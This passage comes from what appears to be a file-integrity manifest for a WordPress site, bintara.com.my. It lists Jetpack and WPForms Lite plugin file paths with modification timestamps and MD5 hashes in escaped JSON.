woff\":{\"d\":1544704153,\"h\":\"bf14c27ea9c87c43ee68e24fad21f3f5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/social-logos\\/social-logos.eot\":{\"d\":1544704153,\"h\":\"d77d4db031b0e02fe460ff4efa5f96c4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/social-logos\\/social-logos.woff2\":{\"d\":1544704153,\"h\":\"3e67f59c2bf087988f340ee941c7d205\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/social-logos\\/social-logos.ttf\":{\"d\":1544704153,\"h\":\"68276ca1a64ff1465a5fc16221bb371a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/twitter-timeline.js\":{\"d\":1544704149,\"h\":\"ba91dba89e86e6d757179067b0bacb19\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/jetpack-modules.models.js\":{\"d\":1544704149,\"h\":\"fd45257774426c3d4694814fcdbef9e1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/jetpack-server-sandbox.php\":{\"d\":1544704149,\"h\":\"0c300d6562f86f17a3526f30fb7817a0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/jetpack-modules.views.js\":{\"d\":1544704152,\"h\":\"8bf9d9e86b0a2488a3901308f4a3f603\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/gallery-settings.js\":{\"d\":1544704152,\"h\":\"42bfd7f3a4f76f51c929cbd0e81ae1f2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/jetpack-modules.js\":{\"d\":1544704152,\"h\":\"9b08d3f325f5f0d1bdeea3b34a38238c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/jetpack-jitm.js\":{\"d\":1544704152,\"h\":\"1599ebb1a0a0027ff1bc140811712b9b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/genericons.php\":{\"d\":1544704152,\"h\":\"db642aa97ec3122ddb8d31bce31fd323\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/class.jetpack-provision.php\":{\"d\":1544704152,\"h\":\"e25ecd492df2344130e44170f300d256\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/facebook-embed.js\":{\"d\":1544704152,\"h\":\"6fd21721b99b97d1b8d6d0c1b57be264\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/spin.js\":{\"d\":1544704152,\"h\":\"ce24b79426e1ba35fe2cc4abbd3bcf4b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/postmessage.js\":{\"d\":1544704152,\"h\":\"eadc5832513d5670884a975c6de10f01\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/jetpack-admin.js\":{\"d\":1544704152,\"h\":\"fb3811738a9e3173d0282fe8efbdce64\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/jetpack-strings.php\":{\"d\":1544704153,\"h\":\"50e15a95b59630da13d742bce390b2e4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/idc-notice.js\":{\"d\":1544704153,\"h\":\"15892d28724152033f1e56078a6874df\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/social-logos.php\":{\"d\":1544704153,\"h\":\"7f32ba61f85763fa6b2b4feadb0526e8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/header.php\":{\"d\":1544704153,\"h\":\"abc9fdc52f4a5fda286958b61fcd4b43\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/accessible-focus.js\":{\"d\":1544704153,\"h\":\"b7aceb02239c26c777c3e82d685ed589\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/jetpack-connection-banner.js\":{\"d\":1544704153,\"h\":\"d6008382c179ba62e79276bd09389636\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/jquery.spin.js\":{\"d\":1544704153,\"h\":\"9d7277fc13a0c90ba1fef6e5fc2341b3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/footer.php\":{\"d\":1544704153,\"h\":\"b55608779b3183907007ccba0bc1c6fe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/jquery.jetpack-resize.js\":{\"d\":1544704153,\"h\":\"483419d4c8d05a1603e147bd62591a3c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-autoupdate.php\":{\"d\":1544704131,\"h\":\"ee9cc737e4d11d98603360d1680fb964\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-heartbeat.php\":{\"d\":1544704131,\"h\":\"c85ac47306cfa12c932f31b9eb88e0b0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-constants.php\":{\"d\":1544704131,\"h\":\"e22d38806611c70d08983fbbf5b9c3d1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-xmlrpc-server.php\":{\"d\":1544704131,\"h\":\"98b7dfcbdf9fd3b68d1a3e6ac7420fc4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-post-images.php\":{\"d\":1544704131,\"h\":\"e64b751dba462f5b655c58c7548126e4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-network-sites-list-table.php\":{\"d\":1544704131,\"h\":\"9feb656917391b97d255ed5cf0125d24\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-admin.php\":{\"d\":1544704131,\"h\":\"ae6a5d685c549814051991793151fbd1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.json-api-endpoints.php\":{\"d\":1544704131,\"h\":\"489ce2f14d338b4ef82f62a0c5e0d559\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/require-lib.php\":{\"d\":1544704131,\"h\":\"f4f607d9678270becda4c6c23626117a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/uninstall.php\":{\"d\":1544704131,\"h\":\"324d22e9494acff7ebdffaf8e3f2193c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/functions.opengraph.php\":{\"d\":1544704131,\"h\":\"ce6d098c356928feb73e4119dfd47237\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/locales.php\":{\"d\":1544704131,\"h\":\"f284d1e16682958d740cc809714e54f2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/functions.compat.php\":{\"d\":1544704131,\"h\":\"5516eedb5d094e443847abb0bbc0d79b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/wpml-config.xml\":{\"d\":1544704131,\"h\":\"dd13b8bf93fbab0051916aa266ff79ab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/jetpack.php\":{\"d\":1544704131,\"h\":\"d2d26d4ae0890bd5427296842c5badd3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-signature.php\":{\"d\":1544704131,\"h\":\"9b1efe6d3982e2775c48bba81c499d8b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.frame-nonce-preview.php\":{\"d\":1544704131,\"h\":\"ef1689264de99240845ebb7ecbf3c2ff\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/functions.global.php\":{\"d\":1544704139,\"h\":\"7062f93474e8f4d4d66b2bc3993a6223\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-client.php\":{\"d\":1544704139,\"h\":\"ec877bf42c6d640300b65d05c6a1ee66\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/changelog.txt\":{\"d\":1544704139,\"h\":\"4975524ad493a0bc8786f1a7292775fb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/CODE-OF-CONDUCT.md\":{\"d\":1544704139,\"h\":\"db6ba0afc337663f8b36ca44ad28f9c2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-network.php\":{\"d\":1544704139,\"h\":\"ec0498d78b35646265f0d73a5a33efd9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-bbpress-json-api-compat.php\":{\"d\":1544704139,\"h\":\"1b1e7b464bc15a186c5ae20c5d5bbae8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-connection-banner.php\":{\"d\":1544704145,\"h\":\"10132e3436d72ea568a7157e51fcb589\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.json-api.php\":{\"d\":1544704145,\"h\":\"c0ec3b7c358fb420bc1622a0d7a634a8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.jetpack.php\":{\"d\":1544704145,\"h\":\"9c33b23d9ef2079b47e03a9f4d391e3b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-twitter-cards.php\":{\"d\":1544704145,\"h\":\"27810d98f05ec95e71e8ad25f1231d00\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.photon.php\":{\"d\":1544704145,\"h\":\"c19c979476280bf803456b4941af4191\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-options.php\":{\"d\":1544704145,\"h\":\"92ecc8c144f001aad7dde4ff5dbaad2a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/.svnignore\":{\"d\":1544704145,\"h\":\"2135bb13fb7a226f2971efadb7421ae5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-data.php\":{\"d\":1544704145,\"h\":\"49c860b80cb0bbbb9415dcf3730426a5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-cli.php\":{\"d\":1544704145,\"h\":\"c3aa9ff8cbb8eb5f36442602cfa1cd90\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-tracks.php\":{\"d\":1544704145,\"h\":\"c0e7dc14676d12d4bb79e15b15abcd05\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/composer.json\":{\"d\":1544704145,\"h\":\"fa4587fdd67094d311317c4788375874\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-error.php\":{\"d\":1544704145,\"h\":\"afbd4bd9f83e4e164d3d7532da438e1c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-debugger.php\":{\"d\":1544704145,\"h\":\"361a73e408eb02dafa67f1b7e20ddf1a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-gutenberg.php\":{\"d\":1544704145,\"h\":\"2b6302d7f945cbe1a0c2f958af1bacc8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/readme.txt\":{\"d\":1544704145,\"h\":\"aa6bcd7735af0bc15efbbb3c56dd625c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-api-config.php\":{\"d\":1544704145,\"h\":\"feaa6519e44a91e9397ec2caf163211a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/functions.photon.php\":{\"d\":1544704145,\"h\":\"93593b5490d80f9b0ec48bba320029c7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-jitm.php\":{\"d\":1544704145,\"h\":\"37467e0514f816fbb8164a74a150fd2d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/functions.gallery.php\":{\"d\":1544704145,\"h\":\"dc0e8c065b108f7675efa3f6cee0e078\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-idc.php\":{\"d\":1544704145,\"h\":\"184c00299686753331d3a86813d5cf59\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-user-agent.php\":{\"d\":1544704153,\"h\":\"eccc171b1c08363cdeb571bf8ea34f11\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-ixr-client.php\":{\"d\":1544704153,\"h\":\"cd0f9614076a906cd9a34559c823529c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints.php\":{\"d\":1544704153,\"h\":\"5db0a81da4ea6c00d948f1400236960f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-client-server.php\":{\"d\":1544704153,\"h\":\"13f23dcf962256d04d0fb8543a676c02\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/class.jetpack-modules-list-table.php\":{\"d\":1544704153,\"h\":\"68559aa7faf1c1ece2e95230c1eae329\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/challenge.min.css\":{\"d\":1545638191,\"h\":\"7a8aee8c222993ffd9f8783b89a83465\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/jquery-confirm.min.css\":{\"d\":1545638191,\"h\":\"c2b359a37a11f61270eb852fc4b8f16b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/flatpickr.min.css\":{\"d\":1545638191,\"h\":\"affb2497346c2fd410d7de6e5d04bcf8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/admin.min.css\":{\"d\":1545638193,\"h\":\"b8b37e811d02f15ffdae6eb96072448c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/dashboard-widget.min.css\":{\"d\":1545638193,\"h\":\"eb23b474745009872ad153904515db07\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/builder.css\":{\"d\":1545638193,\"h\":\"b77c0e5141b00013a507b8a456148939\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/admin-builder-setup.css\":{\"d\":1545638193,\"h\":\"364214765ea1d743c92e3e853b7c53cd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/wpforms-preview.css\":{\"d\":1545638193,\"h\":\"8db18efacb9fcb30ef22781aef87a0eb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/admin-builder-fields.css\":{\"d\":1545638193,\"h\":\"692dcd3aa5434bdc223effcc667536fc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/jquery.timepicker.css\":{\"d\":1545638193,\"h\":\"cca842fb17ee6b670cbb8544e6921cf2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/jquery.minicolors.css\":{\"d\":1545638193,\"h\":\"21dc5677b136ee45fb5caf30c1ad7e17\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/dashboard-widget.css\":{\"d\":1545638193,\"h\":\"a58fa40c700219ebba3c7afa81fb7a8c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/font-awesome.min.css\":{\"d\":1545638193,\"h\":\"269550530cc127b6aa5a35925a7de6ce\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/admin-builder-providers.css\":{\"d\":1545638193,\"h\":\"71d6041e5de61d07dc0ffb1e3c4a7572\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/wpforms-full.css\":{\"d\":1545638193,\"h\":\"92a316ee3e0c5d6763114cc075821011\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/challenge.css\":{\"d\":1545638193,\"h\":\"f46d67e3f3183a72513ba369138f8c7d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/builder.min.css\":{\"d\":1545638193,\"h\":\"f6dd65acf505e798117078182b740978\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/wpforms-base.css\":{\"d\":1545638193,\"h\":\"2a552b5336bccbea606a752f9de882f0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/admin-builder-conditional-logic-core.css\":{\"d\":1545638193,\"h\":\"3f0e3ea5d4f476a2a9c70ecc190a318a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/admin.css\":{\"d\":1545638193,\"h\":\"77c6695e37ad44cd63f944cecd50cc86\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/tooltipster.css\":{\"d\":1545638193,\"h\":\"39f9136a3a74155c5a941431d756c939\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/admin-builder.css\":{\"d\":1545638193,\"h\":\"55bab24d4e4d40a4b73ac2d186fd103a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/gutenberg\\/formselector.min.js\":{\"d\":1545638193,\"h\":\"b56e5f067b907f1abd83192690c7f087\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/gutenberg\\/formselector.js\":{\"d\":1545638193,\"h\":\"52ffc3892a5cbaef47d4c2318031c633\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/builder\\/templates.js\":{\"d\":1545638193,\"h\":\"62a70ef16a8b8a16414c5cc9f136de8e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/builder\\/providers.min.js\":{\"d\":1545638193,\"h\":\"124abfc1804b53aeb14d857a3ba85345\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/builder\\/templates.min.js\":{\"d\":1545638193,\"h\":\"dedcc0688b93747cc03957c0c8c5813b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/builder\\/providers.js\":{\"d\":1545638193,\"h\":\"a63c3f0c13c14da774e3380a687f6c28\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/challenge\\/challenge-embed.js\":{\"d\":1545638193,\"h\":\"7287632abce05fb9f0dd412ff84ad3ed\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/challenge\\/challenge-builder.js\":{\"d\":1545638193,\"h\":\"57b4a3f1b0600d1d2cc3563056e19fe0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/challenge\\/challenge-builder.min.js\":{\"d\":1545638193,\"h\":\"e020b81de5fbb14bf09a80ad62b8463f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/challenge\\/challenge-embed.min.js\":{\"d\":1545638193,\"h\":\"ab6e2df92f1f3d267c6a3685f6fe9748\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/challenge\\/challenge-core.js\":{\"d\":1545638193,\"h\":\"f72d9388bf260f2774089f036453fc0a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/challenge\\/challenge-admin.js\":{\"d\":1545638193,\"h\":\"30f44fab7f5c45c00945ce831dc66eaf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/challenge\\/challenge-core.min.js\":{\"d\":1545638193,\"h\":\"b2d6526882afa7b187c1c5410690da38\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/challenge\\/challenge-admin.min.js\":{\"d\":1545638193,\"h\":\"2b5ca4c19b60e56ab4791e46b978dce0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/jquery.timepicker.min.js\":{\"d\":1545638193,\"h\":\"f4b47962063343eaa3937d960b2752ef\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/jquery.jquery-confirm.min.js\":{\"d\":1545638193,\"h\":\"7cb6c13bd7fe931f3d0321a83267941c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/jquery.inputmask.bundle.min.js\":{\"d\":1545638193,\"h\":\"cefaffa82671a2a5958766e399b2d42e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/list.min.js\":{\"d\":1545638193,\"h\":\"85f06a1d7d3b386029fc4e3240c5428e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/admin-builder.js\":{\"d\":1545638193,\"h\":\"06af93fd45567c8cb1e55cb0561df0cb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/admin-builder-providers.js\":{\"d\":1545638193,\"h\":\"209ce91d8dabf1e56b3418f2e83ab105\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/moment.min.js\":{\"d\":1545638193,\"h\":\"8999b8b5d07e9c6077ac5ac6bc942968\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/admin-builder-conditional-logic-core.js\":{\"d\":1545638193,\"h\":\"eda1688ffc9c8ee6eb7333ef8e0f8f0e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/admin.js\":{\"d\":1545638193,\"h\":\"d8213bcd836a618b0c017732aa7ffac0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/jquery.matchHeight-min.js\":{\"d\":1545638193,\"h\":\"4d9a91bb66cfabd87602261b4b33d26a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/wpforms.js\":{\"d\":1545638193,\"h\":\"09d31a2a8ee9525d131657ed325f0c46\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/jquery.validate.min.js\":{\"d\":1545638193,\"h\":\"44129a38b53be0fa07af3787460e8b75\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/jquery.serialize-object.min.js\":{\"d\":1545638193,\"h\":\"5d873c724a7aa020c96f972a8228005b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/jquery.payment.min.js\":{\"d\":1545638193,\"h\":\"703593b205e1bac0dd61a47f29796bf9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/choices.min.js\":{\"d\":1545638193,\"h\":\"d8534d2ae56671c256cde1197b8b0a5f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/jquery.conditionals.min.js\":{\"d\":1545638193,\"h\":\"5db6700370202c4e745e5241c361d602\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/admin-utils.js\":{\"d\":1545638193,\"h\":\"8f4b7b1622534f99cde5e842eed48ee1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/jquery.tooltipster.min.js\":{\"d\":1545638193,\"h\":\"843b8a8618e600e4071e0e15ed40404a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/admin-editor.js\":{\"d\":1545638193,\"h\":\"9cdd7d9e89eed10295f5e66564e1834e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/moment-with-locales.min.js\":{\"d\":1545638193,\"h\":\"a79a8710a3517e497846aca9179f8d81\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/wpforms-confirmation.js\":{\"d\":1545638193,\"h\":\"75c6ec05de62b16cd6bdcebbabf6c702\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wpforms-lite\\/